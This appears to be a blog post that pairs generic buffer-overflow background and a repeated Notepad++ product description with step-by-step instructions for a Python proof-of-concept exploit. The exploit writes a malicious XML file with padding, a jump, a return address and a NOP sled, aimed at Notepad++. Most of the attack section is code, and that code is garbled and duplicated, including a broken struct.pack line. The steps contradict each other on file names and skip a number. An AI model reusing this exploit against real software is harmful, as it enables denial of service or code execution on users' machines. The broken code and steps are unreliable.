Attackers generally use buffer overflows to corrupt the execution stack of a web application. By sending
carefully crafted input to a web application, an attacker can cause the
web application to execute arbitrary code, possibly taking over the
machine. Attackers have managed to identify buffer overflows in a
staggering array of products and components. Buffer overflow flaws can be present in both the web server and
application server products that serve the static and dynamic portions
of a site, or in the web application itself. Buffer overflows found in
commonly-used server products are likely to become widely known and can
pose a significant risk to users of these products. When web
applications use libraries, such as a graphics library to generate
images or a communications library to send e-mail, they open themselves
to potential buffer overflow attacks.
Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily.
Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily.
Buffer overflows can also be found in custom web application
code, and may even be more likely, given the lack of scrutiny that web
applications typically go through. Buffer overflow attacks against
customized web applications can sometimes lead to interesting results.
In some cases, we have discovered that sending large inputs can cause
the web application or the back-end database to malfunction. It is
possible to cause a denial of service attack against the web site,
depending on the severity and specific nature of the flaw. Overly large
inputs could cause the application to display a detailed error message,
potentially leading to a successful attack on the system.
Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages.
It is running in the MS Windows environment, its use is governed by GPL License.
Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment.
Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages.
It is running in the MS Windows environment, its use is governed by GPL License.
Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment.
Steps to Reproduce
1. Use this exploit code and make a python file in your kali linux system.
Code :
import struct
def little_endian(address):
return struct.pack("poc ="\x41" * 591
poc+="\xeb\x06\x90\x90"
poc+=little_endian(0x1004C31F)
poc+="\x90" * 80
poc+="\x90" * (20000 - len(poc))
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit = header + footer
filename = "notepad.xml"
file = open(filename , "w")
file.write(exploit)
file.close()
def little_endian(address):
return struct.pack("
poc+="\xeb\x06\x90\x90"
poc+=little_endian(0x1004C31F)
poc+="\x90" * 80
poc+="\x90" * (20000 - len(poc))
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit = header + footer
filename = "notepad.xml"
file = open(filename , "w")
file.write(exploit)
file.close()
Create a python file with your favorite editor as I am using nano.
nano notepad_exploit.py
nano notepad_exploit.py
2. Copy paste this exploit into that and save & exit.
3. Run that file with python command.
python notepad_exploit.py
4. Now document.xml file must be created. Let's see the content of that file with below command.
cat document.xml
6. Now lets analyze the windows performance now by opening notepad++.
7. Now opened that document.xml file in notepad++ and observed CPU performance was as follows:
By analyzing windows performance it can be proved that notepad++ running very slow and if characters are inserted for input CPU performance hikes to 100%.
Credit:
# CVE: CVE-2014-1004
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email: taurusomar13@gmail.com
References - https://www.owasp.org/index.php/Buffer_Overflow
http://www.horstmann.com/sjsu/spring2008/cs40/buffer-overflow1.jpg
1 comment:
Thanks for your blog And GOod information provide your blog more information our site Post processing
Post a Comment